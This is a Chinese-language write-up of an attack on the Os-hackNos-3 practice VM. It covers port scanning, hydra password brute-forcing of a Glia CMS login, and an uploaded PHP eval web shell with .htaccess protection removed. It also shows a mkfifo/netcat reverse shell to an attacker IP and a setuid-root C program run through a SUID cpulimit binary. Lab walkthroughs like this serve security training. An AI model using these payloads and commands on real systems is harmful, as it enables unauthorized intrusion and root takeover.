当前位置: 首页 > news >正文

Os-hackNos-3

Os-hackNos-3

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.145

     arp-scan -l
    

    在这里插入图片描述

  • 端口扫描,开放了22和80端口

    nmap -P -sV 192.168.80.145
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    find the Bug
    You need extra WebSec翻译
    找到Bug
    你需要额外的网络安全
    

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.145/" -e *
    

    在这里插入图片描述

  • 访问/scripts

    在这里插入图片描述

  • 查看automail.pl文件

    #!/usr/bin/perl
    #######################################################################
    #    automail.pl
    #
    #    Perl script used for remote email piping...same as as the PHP version.
    #
    #    Peter Rotich <peter@osticket.com>
    #    Copyright (c) 2006-2013 osTicket
    #    http://www.osticket.com
    #
    #    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    #    See LICENSE.TXT for details.
    #
    #    vim: expandtab sw=4 ts=4 sts=4:
    ########################################################################Configuration: Enter the url and key. That is it.
    #  url=> URL to pipe.php e.g http://yourdomain.com/support/api/tickets.email
    #  key=> API Key (see admin panel on how to generate a key)%config = (url => 'http://yourdomain.com/support/api/tickets.email',key => 'API KEY HERE');#Get piped message from stdin
    while (<STDIN>) {$rawemail .= $_;
    }use LWP::UserAgent;
    $ua = LWP::UserAgent->new;$ua->agent('osTicket API Client v1.7');
    $ua->default_header('X-API-Key' => $config{'key'});
    $ua->timeout(10);use HTTP::Request::Common qw(POST);my $enc ='text/plain';
    my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail);
    $response = $ua->request($req);#
    # Process response
    # Add exit codes - depending on what your  MTA expects.
    # By default postfix exit codes are used - which are standard for MTAs.
    #use Switch;$code = 75;    
    switch($response->code) {case 201 { $code = 0; }case 400 { $code = 66; }case [401,403] { $code = 77; }case [415,416,417,501] { $code = 65; }case 503 { $code = 69 }case 500 { $code = 75 }
    }
    #print "RESPONSE: ". $response->code. ">>>".$code;
    exit $code;
    
    这段Perl脚本的功能是通过osTicket API将电子邮件消息发送到指定的URL,并根据响应的状态码确定退出码。1. `%config = (url => 'http://yourdomain.com/support/api/tickets.email', key => 'API KEY HERE');` - 定义了存储URL和API密钥的哈希表。
    2. `while (<STDIN>) { $rawemail .= $_; }` - 从标准输入读取管道传输的电子邮件消息并存储在变量 `$rawemail` 中。
    3. `use LWP::UserAgent; $ua = LWP::UserAgent->new; $ua->agent('osTicket API Client v1.7'); $ua->default_header('X-API-Key' => $config{'key'}); $ua->timeout(10);` - 导入LWP::UserAgent模块,创建UserAgent对象,并设置默认的用户代理和超时。
    4. `use HTTP::Request::Common qw(POST);` - 导入HTTP::Request::Common模块,并引入POST请求类型。
    5. `my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail); $response = $ua->request($req);` - 创建一个POST请求,将原始电子邮件消息作为内容发送到指定的URL,并获取响应。
    6. `use Switch;` - 导入Switch模块,用于实现switch语句。
    7. `switch($response->code) { case 201 {...} case 400 {...} ... }` - 用switch语句根据响应状态码选择不同的退出码(根据邮件传输代理的标准)。
    8. `exit $code;` - 根据计算得到的退出码退出脚本
    
  • 没啥价值,根据上面的提示访问/websec路径,发现一个博客和一个邮箱

    contact@hacknos.com
    

    在这里插入图片描述

  • 博客使用Glia CMS搭建的

    在这里插入图片描述

    在这里插入图片描述

三、密码爆破

  • 猜测刚才发现的邮箱就是用户名,再爬取网站信息生成密码本

    cewl http://192.168.80.145/websec/ >/tmp/passwd
    

    在这里插入图片描述

  • 密码爆破

    hydra -l contact@hacknos.com -P /tmp/passwd 192.168.80.145 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
    

    在这里插入图片描述

  • 登录系统,发现是管理员权限,版本是1.10.9

    用户名:contact@hacknos.com
    密码:Securityx
    

    在这里插入图片描述

四、漏洞利用

  • 在后台发现文件上传功能(content->file managee),上传一句话mua

    <?php @eval($_POST['glc']);?>
    

    在这里插入图片描述

  • 发现文件被上传到了assets目录,在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存

    在这里插入图片描述

  • 使用蚁剑连接,拿到shell

    在这里插入图片描述

五、权限提升

  • nc建立连接

    kali:nc -lvnp 8848
    靶机:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.80.139 8848 >/tmp/f然后执行python -c 'import pty; pty.spawn("/bin/bash")'
    

    在这里插入图片描述

  • 查看是否存在可以提权的命令

    find /usr/bin -type f -perm -u=s 2>/dev/null
    

    在这里插入图片描述

1.第一种方法
  • 发现cpulimit 命令,尝试用cpulimit提权

    一个用户调整CPU使用的命令,cpulimit`命令主要对长期运行的和 CPU 密集型的进程有用
    
    #include<stdio.h>
    #include<unistd.h>
    #include<stdlib.h>int main()
    {setuid(0);setgid(0);system("/bin/bash");return 0;
    }
    
  • 将上面的代码编译为exp,上传之后使用添加运行权限

    gcc cpu.c -o exp
    chmod 777 exp
    

    在这里插入图片描述

  • 使用cpulimit -l 100 -f ./exp进行提权

2.第二种方法
  • /var/local/database中发现了经过加密的内容

    Expenses
    Software Licenses,$2.78
    Maintenance,$68.87
    Mortgage Interest,$70.35
    Advertising,$9.78
    Phone,$406.80
    Insurance,$9.04
    Opss;fackespreadsheet
    

    在这里插入图片描述

  • 对密文进行解密,得到密码明文Security@x@

    https://link.csdn.net/?target=https%3A%2F%2Fwww.spammimic.com%2Fspreadsheet.php
    
  • 登录用户blackdevil,该用户是在/home目录下发现的,然后用sudo提权

    在这里插入图片描述

http://www.lryc.cn/news/239264.html

相关文章:

  • 时序预测 | Matlab实现HPO-ELM猎食者算法优化极限学习机的时间序列预测
  • LeetCode:307. 区域和检索 - 数组可修改(树状数组 C++)
  • 909-2015-T3
  • 【云原生】初识 Service Mesh
  • 常见的8个JMeter压测问题
  • 深度学习卷积神经网络垃圾分类系统 - 深度学习 神经网络 图像识别 垃圾分类 算法 小程序 计算机竞赛
  • 羊大师教你如何有效解决工作中的挑战与压力?
  • 【性能测试】稳定性/并发压力测试的TPS计算+5W并发场景设计...
  • 人工智能的时代---AI的影响
  • LeetCode 每日一题 2023/11/13-2023/11/19
  • Leetcode——169 多数元素
  • vue中原生H5拖拽排序_拖拽图片也是同样的道理
  • 【C语言】计算实时太阳角度(高度角、方位角),以及使用stm32单片机实时获取时间戳
  • 创建git仓库
  • 19.悲观锁与乐观锁解析
  • C语言--给出一个点的坐标判断它在单位圆的内部外部还是上面
  • 变频器基础问答集21-50
  • OpenCvSharp从入门到实践-(01)认识OpenCvSharp开发环境搭建
  • OSG文字-渐变文字(4)
  • 排查生产环境:MySQLTransactionRollbackException数据库死锁
  • 140.【鸿蒙OS开发-01】
  • npm install 下载不下来依赖解决方案
  • 接口自动化中cookies的处理技术
  • PHP 安装
  • 小程序常见操作
  • STM32F4串口USART发送为00的解决方案
  • 重磅解读 | 阿里云 云网络领域关键技术创新
  • 【蓝桥杯省赛真题45】Scratch九宫格游戏 蓝桥杯scratch图形化编程 中小学生蓝桥杯省赛真题讲解
  • 物联网AI MicroPython学习之语法 ADC数模模块
  • 详解Python中哈希表的使用。站在开发者角度,与大家一起探究哈希的世界。